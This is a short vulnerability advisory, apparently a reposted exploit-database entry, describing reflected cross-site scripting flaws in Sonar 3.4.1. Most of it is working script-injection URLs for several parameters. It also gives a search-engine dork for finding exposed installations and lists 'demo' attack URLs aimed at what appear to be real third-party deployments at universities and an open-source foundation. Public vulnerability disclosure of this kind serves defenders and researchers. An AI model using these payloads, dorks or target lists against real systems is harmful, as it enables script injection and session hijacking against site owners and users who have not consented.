Sonar version 3.4.1 suffers from a cross site scripting vulnerability.
da83d02310daea94e8be2a54b299f802fa374cffed0e8c946fa47d875567844a
Sonar v.3.4.1 => XSS (CWE-79)
+ Vendor info
http://www.sonarsource.com/
Dork : intext:"Powered by SonarSource"
=========================================================
+ Author: devilteam.pl
+ WWW: http://devilteam.pl/
=========================================================
XSS:
http://foo.bar/dependencies/index?search="><script>alert(/devilteam.pl/
)</script>
http://foo.bar/dashboard/index/41730?did=4&period=3"><script>alert(/
devilteam.pl/)</script>
http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&am
p;author_login=&assignee_login="><script>alert(/devilteam.pl/
)</script>&false_positives=with
out&sort=&asc=false&commit=Search
http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&am
p;author_login="><script>alert(/devilteam.pl/
)</script>&assignee_login=&false_positives=with
out&sort=&asc=false&commit=Search
http://foo.bar/api/sources?resource=<script>alert(/devilteam.pl/
)</script>&format=txt
demo:
http://nemo.sonarXsource.org/dependencies/index?search="><script>alert(/
devilteam.pl/)</script>
https://dev.eclipXse.org/sonar/dependencies/index?search="><script>alert(/
devilteam.pl/)</script>
https://gcrcwin.cXacr.med.umich.edu/sonar/dependencies/index?search=
"><script>alert(/devilteam.pl/)</sc
ript>
http://csci3601sp12.mXorris.umn.edu:2020/sonar/dependencies/index?search=
"><script>alert(/devilteam.pl/)&l
t;/script>
https://redbox-build.cqXu.edu.au/sonar/dependencies/index?search=
"><script>alert(/devilteam.pl/)</scrip
t>
greetz:
cxsec.org
Source: http://cxsecurity.com/blad/WLB-2013020088